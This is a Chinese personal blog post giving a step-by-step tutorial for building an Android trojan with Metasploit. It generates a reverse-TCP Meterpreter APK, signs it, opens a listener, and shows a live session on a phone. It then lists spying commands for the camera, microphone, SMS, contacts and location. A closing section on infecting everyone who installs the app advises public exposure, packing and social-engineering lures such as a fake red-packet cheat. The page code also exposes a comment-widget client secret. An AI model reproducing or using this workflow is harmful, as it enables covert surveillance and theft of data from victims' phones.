<!DOCTYPE HTML>
<html lang="">


<head><meta name="generator" content="Hexo 3.8.0">
    <meta charset="utf-8">
    <meta name="keywords" content="kali生成安卓木马, Joker">
    <meta name="description" content="前置条件需要有kali系统并且保证相关命令正常执行。登录Oracle官网下载Linux版的jdk事出有因，期末了各科都要交项目，安卓也不例外，我想着交什么呢？交安卓app感觉太过乏味，还是这个比较新颖，显得Big高。
操作1.打开终端，输入">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <title>kali生成安卓木马 | Joker</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/font-awesome.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">
    <style type="text/css">
        
    </style>

    <script src="/libs/jquery/jquery-2.2.0.min.js"></script>
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>


<body>

<header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Joker</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fa fa-navicon"></i></a>
<ul class="right">
    
    <li class="hide-on-med-and-down">
        <a href="/" class="waves-effect waves-light">
            
            <i class="fa fa-home"></i>
            
            <span>首页</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/tags" class="waves-effect waves-light">
            
            <i class="fa fa-tags"></i>
            
            <span>标签</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/categories" class="waves-effect waves-light">
            
            <i class="fa fa-bookmark"></i>
            
            <span>分类</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/archives" class="waves-effect waves-light">
            
            <i class="fa fa-archive"></i>
            
            <span>归档</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/about" class="waves-effect waves-light">
            
            <i class="fa fa-user-circle-o"></i>
            
            <span>关于个人</span>
        </a>
    </li>
    
    <li class="hide-on-med-and-down">
        <a href="/friends" class="waves-effect waves-light">
            
            <i class="fa fa-address-book"></i>
            
            <span>友情链接</span>
        </a>
    </li>
    
    <li>
        <a href="#searchModal" class="modal-trigger waves-effect waves-light">
            <i id="searchIcon" class="fa fa-search" title="Search"></i>
        </a>
    </li>
</ul>

<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Joker</div>
        <div class="logo-desc">
            
            我什么时候才能像你一样优秀呢！
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li>
            <a href="/" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-home"></i>
                
                首页
            </a>
        </li>
        
        <li>
            <a href="/tags" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-tags"></i>
                
                标签
            </a>
        </li>
        
        <li>
            <a href="/categories" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-bookmark"></i>
                
                分类
            </a>
        </li>
        
        <li>
            <a href="/archives" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-archive"></i>
                
                归档
            </a>
        </li>
        
        <li>
            <a href="/about" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-user-circle-o"></i>
                
                关于个人
            </a>
        </li>
        
        <li>
            <a href="/friends" class="waves-effect waves-light">
                
                <i class="fa fa-fw fa-address-book"></i>
                
                友情链接
            </a>
        </li>
        
        
    </ul>
</div>

        </div>

        
    </nav>

</header>


<script src="/libs/cryptojs/crypto-js.min.js"></script>
<script>
    (function() {
        let pwd = '';
        if (pwd && pwd.length > 0) {
            if (pwd !== CryptoJS.SHA256(prompt('请输入访问本文章的密码')).toString(CryptoJS.enc.Hex)) {
                alert('密码错误，将返回主页！');
                location.href = '/';
            }
        }
    })();
</script>




<div class="bg-cover pd-header post-cover" style="background-image: url('http://img.ahdy.top/171113.jpg')">
    <div class="container">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <div class="description center-align post-title">
                        kali生成安卓木马
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>



<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #toc-content .is-active-link::before {
        background-color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 20px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/Kali/" target="_blank">
                                <span class="chip bg-color">Kali</span>
                            </a>
                        
                            <a href="/tags/木马/" target="_blank">
                                <span class="chip bg-color">木马</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fa fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/Kali/" class="post-category" target="_blank">
                                Kali
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                <div class="post-date info-break-policy">
                    <i class="fa fa-calendar-minus-o fa-fw"></i>Publish Date:&nbsp;&nbsp;
                    2019-12-29
                </div>

                
                    
                    <div class="info-break-policy">
                        <i class="fa fa-file-word-o fa-fw"></i>Word Count:&nbsp;&nbsp;
                        2.4k
                    </div>
                    

                    
                    <div class="info-break-policy">
                        <i class="fa fa-clock-o fa-fw"></i>Read Times:&nbsp;&nbsp;
                        11 Min
                    </div>
                    
                
				
				
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="fa fa-eye fa-fw"></i>Read Count:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h3 id="前置条件"><a href="#前置条件" class="headerlink" title="前置条件"></a>前置条件</h3><p>需要有kali系统并且保证相关命令正常执行。<br>登录Oracle官网下载Linux版的jdk<br>事出有因，期末了各科都要交项目，安卓也不例外，我想着交什么呢？交安卓app感觉太过乏味，还是这个比较新颖，显得Big高。</p>
<h3 id="操作"><a href="#操作" class="headerlink" title="操作"></a>操作</h3><p>1.打开终端，输入ifconfig查看ip地址(也是监听地址)<br>2.输入以下命令</p>
<pre><code>msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R &gt; /root/apk.apk
</code></pre><p>3.为了木马的兼容性为其配置签名，并验证  </p>
<pre><code>创建证书:
keytool -genkey -V -keystore apk-trojan-key.keystore -alias apk -keyalg RSA -keysize 1024 -validity 999  
注意:这里alias参数后跟apk文件夹的文件名，文件名参考第二部生成，可自行设置。  
签名:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore apk.apk apk 
验证:
jarsigner -verify -verbose apk.apk
</code></pre><p>4.使用Zipalign优化apk</p>
<pre><code>安装命令:
apt-get install zipalign
优化apk:
zipalign -v 4 apk.apk aaaa.apk
</code></pre><p>5.启动攻击加载模块，设置反弹连接</p>
<pre><code>启动msf:
msfconsole
1.use exploit/multi/handler //加载模块
2. set payload android/meterpreter/reverse_tcp //选择Payload
3.show options //查看参数设置

这个payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置

1.set LHOST 172.23.0.209 //这里的地址设置成我们刚才生成木马的IP地址
2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口
3.exploit //开始执行漏洞 开始监听,等待手机上线
</code></pre><h4 id="结果流程演示"><a href="#结果流程演示" class="headerlink" title="结果流程演示"></a>结果流程演示</h4><pre><code>root@kali:~# ifconfig
eth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500
        inet 10.210.26.27  netmask 255.255.248.0  broadcast 10.210.31.255
        inet6 fe80::20c:29ff:fe4f:7237  prefixlen 64  scopeid 0x20&lt;link&gt;
        ether 00:0c:29:4f:72:37  txqueuelen 1000  (Ethernet)
        RX packets 16  bytes 2062 (2.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 37  bytes 3277 (3.2 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73&lt;UP,LOOPBACK,RUNNING&gt;  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10&lt;host&gt;
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 20  bytes 1116 (1.0 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 20  bytes 1116 (1.0 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=10.210.26.27 LPORT=5555 R &gt; /root/apk.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 10085 bytes

root@kali:~# keytool -genkey -V -keystore apk-trojan-key.keystore -alias apk -keyalg RSA -keysize 1024 -validity 999
输入密钥库口令:  
再次输入新口令: 
您的名字与姓氏是什么?
  [Unknown]:  1
您的组织单位名称是什么?
  [Unknown]:  1
您的组织名称是什么?
  [Unknown]:  1
您所在的城市或区域名称是什么?
  [Unknown]:  1
您所在的省/市/自治区名称是什么?
  [Unknown]:  1
该单位的双字母国家/地区代码是什么?
  [Unknown]:  1
CN=1, OU=1, O=1, L=1, ST=1, C=1是否正确?
  [否]:  y

正在为以下对象生成 1,024 位RSA密钥对和自签名证书 (SHA256withRSA) (有效期为 999 天):
     CN=1, OU=1, O=1, L=1, ST=1, C=1
输入 &lt;apk&gt; 的密钥口令
    (如果和密钥库口令相同, 按回车):  
[正在存储apk-trojan-key.keystore]

Warning:
JKS 密钥库使用专用格式。建议使用 &quot;keytool -importkeystore -srckeystore apk-trojan-key.keystore -destkeystore apk-trojan-key.keystore -deststoretype pkcs12&quot; 迁移到行业标准格式 PKCS12。
root@kali:~# jarsigner -verbose -sigalg SHA256withRSA -digestalg SHA1 -keystore apk-trojan-key.keystore apk.apk apk
输入密钥库的密码短语: 
   正在添加: META-INF/APK.SF
   正在添加: META-INF/APK.RSA
  正在签名: AndroidManifest.xml
  正在签名: resources.arsc
  正在签名: classes.dex
&gt;&gt;&gt; 签名者
    X.509, CN=1, OU=1, O=1, L=1, ST=1, C=1
    [可信证书]

jar 已签名。

警告: 
签名者证书为自签名证书。
root@kali:~# jarsigner -verify -verbose apk.apk

s        258 Sat Dec 28 10:47:08 EST 2019 META-INF/MANIFEST.MF
         393 Sat Dec 28 10:49:06 EST 2019 META-INF/APK.SF
         870 Sat Dec 28 10:49:06 EST 2019 META-INF/APK.RSA
         272 Sat Dec 28 10:47:08 EST 2019 META-INF/SIGNFILE.SF
        1842 Sat Dec 28 10:47:08 EST 2019 META-INF/SIGNFILE.RSA
           0 Sat Dec 28 10:47:08 EST 2019 META-INF/
sm      6992 Sat Dec 28 10:47:08 EST 2019 AndroidManifest.xml
sm       572 Sat Dec 28 10:47:08 EST 2019 resources.arsc
sm     19932 Sat Dec 28 10:47:08 EST 2019 classes.dex

  s = 已验证签名 
  m = 在清单中列出条目
  k = 在密钥库中至少找到了一个证书
  i = 在身份作用域内至少找到了一个证书

- 由 &quot;CN=1, OU=1, O=1, L=1, ST=1, C=1&quot; 签名
    摘要算法: SHA1
    签名算法: SHA256withRSA, 1024 位密钥
- 无法解析的与签名相关的文件 META-INF/SIGNFILE.SF

jar 已验证。

警告: 
此 jar 包含其证书链无效的条目。原因: PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target
此 jar 包含其签名者证书为自签名证书的条目。
此 jar 包含的签名没有时间戳。如果没有时间戳, 则在其中任一签名者证书到期 (最早为 2022-09-22) 之后, 用户可能无法验证此 jar。

有关详细信息, 请使用 -verbose 和 -certs 选项重新运行。

签名者证书将于 2022-09-22 到期。
root@kali:~# zipalign -v 4 apk.apk aaaa.apk
Verifying alignment of aaaa.apk (4)...
      50 META-INF/MANIFEST.MF (OK - compressed)
     283 META-INF/APK.SF (OK - compressed)
     626 META-INF/APK.RSA (OK - compressed)
    1316 META-INF/ (OK)
    1366 META-INF/SIGNFILE.SF (OK - compressed)
    1648 META-INF/SIGNFILE.RSA (OK - compressed)
    2733 AndroidManifest.xml (OK - compressed)
    4500 resources.arsc (OK - compressed)
    4730 classes.dex (OK - compressed)
Verification successful
root@kali:~# msfconsole
[-] ***rting the Metasploit Framework console...-
[-] * WARNING: No database support: could not connect to server: Connection refused
    Is the server running on host &quot;localhost&quot; (::1) and accepting
    TCP/IP connections on port 5432?
could not connect to server: Connection refused
    Is the server running on host &quot;localhost&quot; (127.0.0.1) and accepting
    TCP/IP connections on port 5432?

[-] ***


      .:okOOOkdc&#39;           &#39;cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  &#39;OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO&#39;
  oOOOOOOOO.    .oOOOOoOOOOl.    ,OOOOOOOOo
  dOOOOOOOO.      .cOOOOOc.      ,OOOOOOOOx
  lOOOOOOOO.         ;d;         ,OOOOOOOOl
  .OOOOOOOO.   .;           ;    ,OOOOOOOO.
   cOOOOOOO.   .OOc.     &#39;oOO.   ,OOOOOOOc
    oOOOOOO.   .OOOO.   :OOOO.   ,OOOOOOo
     lOOOOO.   .OOOO.   :OOOO.   ,OOOOOl
      ;OOOO&#39;   .OOOO.   :OOOO.   ;OOOO;
       .dOOo   .OOOOocccxOOOO.   xOOd.
         ,kOl  .OOOOOOOOOOOOO. .dOk,
           :kk;.OOOOOOOOOOOOO.cOk:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .

       =[ metasploit v5.0.41-dev                          ]
    + -- --=[ 1914 exploits - 1074 auxiliary - 330 post       ]
    + -- --=[ 556 payloads - 45 encoders - 10 nops            ]
    + -- --=[ 4 evasion                                       ]

msf5 &gt; use exploit/multi/handler
msf5 exploit(multi/handler) &gt; set payload android/meterpreter/reverse_tcp
payload =&gt; android/meterpreter/reverse_tcp
msf5 exploit(multi/handler) &gt; show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (android/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) &gt; set LHOST 10.210.26.27
LHOST =&gt; 10.210.26.27
msf5 exploit(multi/handler) &gt; set LPORT 5555
LPORT =&gt; 5555
msf5 exploit(multi/handler) &gt; exploit

[*] Started reverse TCP handler on 10.210.26.27:5555 
[*] Sending stage (72435 bytes) to 10.210.26.14
[*] Meterpreter session 1 opened (10.210.26.27:5555 -&gt; 10.210.26.14:53964) at 2019-12-28 10:55:04 -0500

meterpreter &gt; sysinfo
Computer    : localhost
OS          : Android 8.1.0 - Linux 4.19.50-android-x86_64-geeb7e76e5df5 (x86_64)
Meterpreter : dalvik/android
meterpreter &gt; 到此完成木马生成及植入
</code></pre><h3 id="木马常用监听命令"><a href="#木马常用监听命令" class="headerlink" title="木马常用监听命令"></a>木马常用监听命令</h3><pre><code>     webcam_list  列出网络摄像头
    webcam_stream //开启摄像头
    webcam_snap //隐秘拍照功能

    record_mic [ˈrekərd]/记录/  从默认麦克风录制音频为X秒

    webcam_chat  开始视频聊天

    webcam_snap  从指定的摄像头获取快照

    webcam_stream -i 1  从指定的网络摄像头播放视频流[选择后摄像头]

    Android Commands

    =================

    activity_start  从URI字符串启动Android活动

    check_root  检查设备是否有根

    dump_calllog  获取调用日志

    dump_contacts  获取联系人列表

    dump_sms  获取短信

    geolocate  利用地理定位获取当前LAT

    wlan_geolocate  利用WLAN信息获取当前LAT

    hide_app_icon  从发射器隐藏应用程序图标

    interval_collect  管理区间收集能力

    send_sms  从目标会话发送短消息

    set_audio_mode

    sqlite_query  从存储库查询SQLite数据库

    wakelock  启用/禁用Wakelock

    可以输入?查看更多命令
</code></pre><h3 id="常见问题解决"><a href="#常见问题解决" class="headerlink" title="常见问题解决"></a>常见问题解决</h3><h4 id="jarsigner命令找不到"><a href="#jarsigner命令找不到" class="headerlink" title="jarsigner命令找不到"></a>jarsigner命令找不到</h4><p>原因:没有安装Java jdk，命令基于Java jdk执行，解决需要给kali配置Java jdk环境。<br><a href="https://www.gworg.com/problems/901.html" target="_blank" rel="noopener">jarsigner签名使用</a><br><a href="https://blog.csdn.net/weixin_41732074/article/details/84679138" target="_blank" rel="noopener">推荐jdk安装文档</a></p>
<h4 id="Zipalign无法下载"><a href="#Zipalign无法下载" class="headerlink" title="Zipalign无法下载"></a>Zipalign无法下载</h4><p><img src="http://img.ahdy.top/QQ%E5%9B%BE%E7%89%8720191228215934.png" alt><br>可能跟你当前的网络环境有关系，换数据试一下，如果行不通参考以下<br><a href="https://www.fujieace.com/kali-linux/update-source.html" target="_blank" rel="noopener">kali源更新</a><br>参考其中的更新命令，更新源之后再尝试是否能下载成功插件。</p>
<h4 id="木马生成后监视窗口无响应"><a href="#木马生成后监视窗口无响应" class="headerlink" title="木马生成后监视窗口无响应"></a>木马生成后监视窗口无响应</h4><p>显示Started reverse TCP handler on “IP：端口”<br>但是不管怎么点击手机上的app msf里都没反应呢？</p>
<p>答:<br>服务器这边没反应是没建立起连接。先ping一下查看电脑能否ping通手机，如果可以那可能是端口问题，telnet一下就知道了，有可能端口被防火墙屏蔽了，有可能是端口被其他服务占用了。当然也不排除手机的问题，比如一些安全软件之类的问题，最好在虚拟机内测试避免木马造成不可逆的破坏。</p>
<h3 id="让安装的人都中招"><a href="#让安装的人都中招" class="headerlink" title="让安装的人都中招"></a>让安装的人都中招</h3><p>1.内网穿透，让你的监控地址成为一个公网IP这样就能接收到广域网的传来信息。</p>
<p>2.木马涉及的敏感权限较多，需要加壳，最近在研究apk反编译等技术，希望能修改掉apk图标，名称等。  </p>
<p>3.如何让别人心甘情愿的自己安装，不仅要看木马的伪装，也要看你如何去社工，其实社工的本质就是研究对方的心理，达到欺骗目的，比如你可以说，这是一个抢红包外挂，是不是对方极大程度的对软件的安全性放松警惕呢？</p>
<h3 id="说明"><a href="#说明" class="headerlink" title="说明"></a>说明</h3><p>文章内容仅供学习参考,不得用于非法测试,请遵守国家法律!</p>

            </div>
            <hr>

            
            <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.88rem;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-large waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fa fa-close"></i></a>
            <h4 class="reward-title">您的打赏是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/2019-05-18_143649.png" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/2019-05-18_143810.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>
            

            <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">

<div id="article-share">
    
    <div class="social-share" data-disabled="qzone, qq, weibo, douban"></div>
    
</div>

<script src="/libs/share/js/social-share.min.js"></script>

            


        </div>
    </div>

    
        <link rel="stylesheet" href="/libs/gitalk/gitalk.css">
<link rel="stylesheet" href="/css/my-gitalk.css">

<div class="card gitalk-card" data-aos="fade-up">
    <div id="gitalk-container" class="card-content"></div>
</div>

<script src="/libs/gitalk/gitalk.min.js"></script>
<script>
    let gitalk = new Gitalk({
        clientID: '78aa328b20eecd23b14a',
        clientSecret: '16f06a63894138517c042c4ed46fdd4f2d116373',
        repo: 'zzl521.github.io',
        owner: 'zzl521',
        admin: "zzl521",
        id: '2019-12-29T17-59-00',
        distractionFreeMode: false  // Facebook-like distraction free mode
    });

    gitalk.render('gitalk-container');
</script>
    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6 overflow-policy" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fa fa-chevron-left"></i>&nbsp;Previous</div>
            <div class="card">
                <a href="/2020/01/01/framework/alimessageinterface/">
                    <div class="card-image">
                        
                        <img src="http://img.ahdy.top/131900-1577164740d488.jpg" class="responsive-img" alt="短信服务API">
                        
                        <span class="card-title">短信服务API</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            阿里云短信服务API接口使用
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="fa fa-clock-o fa-fw icon-date"></i>2020-01-01
                        </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/短信服务/" class="post-category" target="_blank">
                                    短信服务
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/API/" target="_blank">
                        <span class="chip bg-color">API</span>
                    </a>
                    
                    <a href="/tags/短信服务/" target="_blank">
                        <span class="chip bg-color">短信服务</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6 overflow-policy" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                Next&nbsp;<i class="fa fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2019/12/28/as/asvmware/">
                    <div class="card-image">
                        
                        <img src="http://img.ahdy.top/235607-1576684567fca7.jpg" class="responsive-img" alt="VMware安装安卓虚拟机">
                        
                        <span class="card-title">VMware安装安卓虚拟机</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            VMware安装安卓虚拟机
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="fa fa-clock-o fa-fw icon-date"></i>2019-12-28
                            </span>
                        <span class="publish-author">
                            
                            <i class="fa fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/VMware/" class="post-category" target="_blank">
                                    VMware
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/环境/" target="_blank">
                        <span class="chip bg-color">环境</span>
                    </a>
                    
                    <a href="/tags/VMware/" target="_blank">
                        <span class="chip bg-color">VMware</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>
</div>



    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="fa fa-list-alt"></i>&nbsp;&nbsp;TOC</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fa fa-list"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            // headingsOffset: -205,
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).slideUp(500);
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).slideDown(500);
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>
    

</main>


<footer class="page-footer bg-color">
    <div class="container row center-align">
        <div class="col s12 m8 l8 copy-right">
            本站由&copy;<a href target="_blank">子龙</a>基于
            <a href="https://hexo.io/" target="_blank">Hexo</a> 的主题搭建.

            
                &nbsp;<i class="fa fa-area-chart"></i>&nbsp;站点总字数:&nbsp;
                <span class="white-color">68.4k</span>
            

            
			
                <br>
                
                <span id="busuanzi_container_site_pv">
                    <i class="fa fa-heart-o"></i>
                    本站总访问量 <span id="busuanzi_value_site_pv" class="white-color"></span>
                </span>
                
                
                <span id="busuanzi_container_site_uv">
                    <i class="fa fa-users"></i>
                    次,&nbsp;访客数 <span id="busuanzi_value_site_uv" class="white-color"></span> 人——
                </span>
                <span id="busuanzi_container_site_uv">
                	<a href="http://beian.miit.gov.cn/state/outPortal/loginPortal.action">皖ICP备19012643号-1</a>       
                </span>
                
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
